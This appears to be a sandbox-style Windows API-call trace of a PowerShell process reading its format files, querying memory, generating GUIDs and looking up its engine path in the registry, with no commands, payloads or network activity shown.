	[0283.198] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.198] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x9f92a2fa, Data2=0xb496, Data3=0x428f, Data4=([0]=0x9f, [1]=0xaf, [2]=0x7a, [3]=0xab, [4]=0x25, [5]=0x57, [6]=0x71, [7]=0xf3))) returned 0x0
	[0283.198] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.198] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.199] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.199] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.199] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.199] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xbe4a6352, Data2=0x67e, Data3=0x4d2b, Data4=([0]=0x9c, [1]=0x33, [2]=0x4b, [3]=0x7b, [4]=0x22, [5]=0x70, [6]=0x77, [7]=0x40))) returned 0x0
	[0283.199] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x35041d37, Data2=0x20ff, Data3=0x482c, Data4=([0]=0xa5, [1]=0x4f, [2]=0x9d, [3]=0x7c, [4]=0x4e, [5]=0xac, [6]=0x80, [7]=0x7f))) returned 0x0
	[0283.200] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x4c465f5, Data2=0xf39e, Data3=0x47fb, Data4=([0]=0xb3, [1]=0x97, [2]=0xcf, [3]=0x50, [4]=0x15, [5]=0x8d, [6]=0xd7, [7]=0xa7))) returned 0x0
	[0283.200] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x535f9909, Data2=0x3c47, Data3=0x46b3, Data4=([0]=0x94, [1]=0x9b, [2]=0x52, [3]=0x7f, [4]=0x6c, [5]=0xb8, [6]=0xd9, [7]=0x6f))) returned 0x0
	[0283.200] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x6590879d, Data2=0x7fd7, Data3=0x45a5, Data4=([0]=0x84, [1]=0x31, [2]=0x68, [3]=0x73, [4]=0x5d, [5]=0xe7, [6]=0x15, [7]=0x95))) returned 0x0
	[0283.200] VirtualQuery (in: lpAddress=0x12bfc0, lpBuffer=0x12ce80, dwLength=0x30 | out: lpBuffer=0x12ce80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.201] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x71660381, Data2=0x2b3f, Data3=0x4a02, Data4=([0]=0xb7, [1]=0xbe, [2]=0x5c, [3]=0x46, [4]=0x68, [5]=0xa3, [6]=0x4f, [7]=0x8b))) returned 0x0
	[0283.201] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x12d9156d, Data2=0x9665, Data3=0x4d78, Data4=([0]=0xb3, [1]=0xd6, [2]=0xb8, [3]=0x91, [4]=0x75, [5]=0x3c, [6]=0xfe, [7]=0x81))) returned 0x0
	[0283.201] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xd8141933, Data2=0x1688, Data3=0x40d8, Data4=([0]=0x8b, [1]=0x54, [2]=0x80, [3]=0x7e, [4]=0x95, [5]=0x9d, [6]=0x5b, [7]=0xdd))) returned 0x0
	[0283.201] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x9e6bbfbd, Data2=0xc44e, Data3=0x4148, Data4=([0]=0x8d, [1]=0xda, [2]=0x9a, [3]=0x7c, [4]=0xcf, [5]=0x66, [6]=0xc1, [7]=0xac))) returned 0x0
	[0283.201] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x5a6cd75d, Data2=0x86d2, Data3=0x4423, Data4=([0]=0xbb, [1]=0xc0, [2]=0xfd, [3]=0x11, [4]=0x69, [5]=0xcc, [6]=0xc0, [7]=0x50))) returned 0x0
	[0283.202] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x8a7cd0d5, Data2=0xd90c, Data3=0x4e6c, Data4=([0]=0x98, [1]=0x47, [2]=0x10, [3]=0x2b, [4]=0x64, [5]=0xc7, [6]=0xca, [7]=0x7d))) returned 0x0
	[0283.202] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xa5513068, Data2=0x537b, Data3=0x4df0, Data4=([0]=0xbe, [1]=0xf9, [2]=0x1f, [3]=0x98, [4]=0xc4, [5]=0xf9, [6]=0xcf, [7]=0xd3))) returned 0x0
	[0283.202] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xf4215fc4, Data2=0x8bc7, Data3=0x4f6f, Data4=([0]=0xaf, [1]=0x44, [2]=0xe1, [3]=0xe0, [4]=0x24, [5]=0xb8, [6]=0x9c, [7]=0x41))) returned 0x0
	[0283.202] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x7e833c81, Data2=0x25b2, Data3=0x485a, Data4=([0]=0x80, [1]=0x66, [2]=0x31, [3]=0x75, [4]=0x8a, [5]=0x7a, [6]=0xdb, [7]=0xeb))) returned 0x0
	[0283.202] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x594f5a58, Data2=0x7caf, Data3=0x443a, Data4=([0]=0xa5, [1]=0x2c, [2]=0x34, [3]=0x57, [4]=0x92, [5]=0xa2, [6]=0xae, [7]=0x3f))) returned 0x0
	[0283.203] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x389164a4, Data2=0x808f, Data3=0x4b9d, Data4=([0]=0xba, [1]=0x1c, [2]=0x8e, [3]=0x41, [4]=0x22, [5]=0xbd, [6]=0xb1, [7]=0x6d))) returned 0x0
	[0283.203] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x4733943, Data2=0xd949, Data3=0x4f63, Data4=([0]=0xa9, [1]=0xce, [2]=0x0, [3]=0x9d, [4]=0x42, [5]=0xe8, [6]=0xc2, [7]=0xd9))) returned 0x0
	[0283.203] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x87ff720c, Data2=0x2ae, Data3=0x492b, Data4=([0]=0xb7, [1]=0xfe, [2]=0xfd, [3]=0xae, [4]=0x4f, [5]=0xa3, [6]=0x78, [7]=0xdd))) returned 0x0
	[0283.203] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xa6694d, Data2=0xd841, Data3=0x4c50, Data4=([0]=0xaa, [1]=0xf0, [2]=0x22, [3]=0x16, [4]=0xa5, [5]=0x7b, [6]=0xc8, [7]=0x19))) returned 0x0
	[0283.203] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xccb8eed5, Data2=0x5768, Data3=0x4cf2, Data4=([0]=0xba, [1]=0x37, [2]=0x4d, [3]=0xf4, [4]=0xa8, [5]=0x9d, [6]=0xce, [7]=0x83))) returned 0x0
	[0283.204] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x674f7445, Data2=0x348b, Data3=0x41e7, Data4=([0]=0x9b, [1]=0xe5, [2]=0xb3, [3]=0x16, [4]=0x97, [5]=0x9b, [6]=0xde, [7]=0xea))) returned 0x0
	[0283.204] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xf0f50418, Data2=0xc6c2, Data3=0x494e, Data4=([0]=0xba, [1]=0xb9, [2]=0x84, [3]=0xd6, [4]=0xf5, [5]=0xd5, [6]=0x71, [7]=0x66))) returned 0x0
	[0283.204] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xfe6bdeb, Data2=0xa70f, Data3=0x4a72, Data4=([0]=0x99, [1]=0xbf, [2]=0xb5, [3]=0x50, [4]=0x14, [5]=0x2b, [6]=0xf5, [7]=0x25))) returned 0x0
	[0283.204] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x3477a94c, Data2=0xdf3a, Data3=0x4dbd, Data4=([0]=0xab, [1]=0x40, [2]=0x7b, [3]=0x78, [4]=0x84, [5]=0x86, [6]=0xc0, [7]=0xa4))) returned 0x0
	[0283.205] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.205] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.205] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.207] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x949e1203, Data2=0xe3f7, Data3=0x42d5, Data4=([0]=0xae, [1]=0x8a, [2]=0xae, [3]=0xfa, [4]=0x5c, [5]=0xdd, [6]=0x21, [7]=0x73))) returned 0x0
	[0283.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.208] SetErrorMode (uMode=0x1) returned 0x1
	[0283.208] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0283.208] GetFileType (hFile=0x300) returned 0x1
	[0283.208] SetErrorMode (uMode=0x1) returned 0x1
	[0283.208] GetFileType (hFile=0x300) returned 0x1
	[0283.208] ReadFile (in: hFile=0x300, lpBuffer=0x2e418c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e418c8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.209] ReadFile (in: hFile=0x300, lpBuffer=0x2e418c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e418c8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.209] ReadFile (in: hFile=0x300, lpBuffer=0x2e418c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e418c8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.209] ReadFile (in: hFile=0x300, lpBuffer=0x2e418c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e418c8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.209] ReadFile (in: hFile=0x300, lpBuffer=0x2e418c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e418c8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.209] ReadFile (in: hFile=0x300, lpBuffer=0x2e418c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e418c8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.210] ReadFile (in: hFile=0x300, lpBuffer=0x2e418c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e418c8*, lpNumberOfBytesRead=0x12d098*=0x119, lpOverlapped=0x0) returned 1
	[0283.210] ReadFile (in: hFile=0x300, lpBuffer=0x2e418c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e418c8*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0283.210] CloseHandle (hObject=0x300) returned 1
	[0283.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.210] SetErrorMode (uMode=0x1) returned 0x1
	[0283.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d040 | out: lpFileInformation=0x12d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0283.216] SetErrorMode (uMode=0x1) returned 0x1
	[0283.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.216] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d128 | out: phkResult=0x12d128*=0x300) returned 0x0
	[0283.217] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d0ac, lpData=0x0, lpcbData=0x12d0a8*=0x0 | out: lpType=0x12d0ac*=0x1, lpData=0x0, lpcbData=0x12d0a8*=0x56) returned 0x0
	[0283.217] CoTaskMemAlloc (cb=0x5a) returned 0x271660
	[0283.217] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d07c, lpData=0x271660, lpcbData=0x12d078*=0x56 | out: lpType=0x12d07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d078*=0x56) returned 0x0
	[0283.217] CoTaskMemFree (pv=0x271660) 
	[0283.217] RegCloseKey (hKey=0x300) returned 0x0
	[0283.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.222] VirtualQuery (in: lpAddress=0x12bbc0, lpBuffer=0x12ca80, dwLength=0x30 | out: lpBuffer=0x12ca80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.222] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xe728fedd, Data2=0xcb4a, Data3=0x4b40, Data4=([0]=0x90, [1]=0xe8, [2]=0xeb, [3]=0x89, [4]=0xad, [5]=0x4f, [6]=0x2e, [7]=0xd6))) returned 0x0
	[0283.222] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.222] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x377ecb28, Data2=0xb422, Data3=0x41ed, Data4=([0]=0x82, [1]=0xf8, [2]=0x66, [3]=0xb0, [4]=0xbb, [5]=0xe0, [6]=0x66, [7]=0xa2))) returned 0x0
	[0283.222] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xacfc5d67, Data2=0xfb07, Data3=0x4a3f, Data4=([0]=0xb9, [1]=0xe6, [2]=0x4e, [3]=0x5d, [4]=0x31, [5]=0x3a, [6]=0xc1, [7]=0x65))) returned 0x0
	[0283.223] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x7a45ca96, Data2=0xbbcf, Data3=0x4b60, Data4=([0]=0x89, [1]=0x7b, [2]=0x40, [3]=0xb6, [4]=0xf0, [5]=0xa1, [6]=0x3d, [7]=0x0))) returned 0x0
	[0283.223] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.223] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.223] SetErrorMode (uMode=0x1) returned 0x1
	[0283.224] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0283.224] GetFileType (hFile=0x300) returned 0x1
	[0283.224] SetErrorMode (uMode=0x1) returned 0x1
	[0283.224] GetFileType (hFile=0x300) returned 0x1
	[0283.224] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.224] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.224] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.225] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.225] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.225] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.225] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.225] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.226] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.226] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.227] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.227] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.227] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.227] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.228] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.228] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.229] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.229] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.814] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.814] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.815] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.815] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
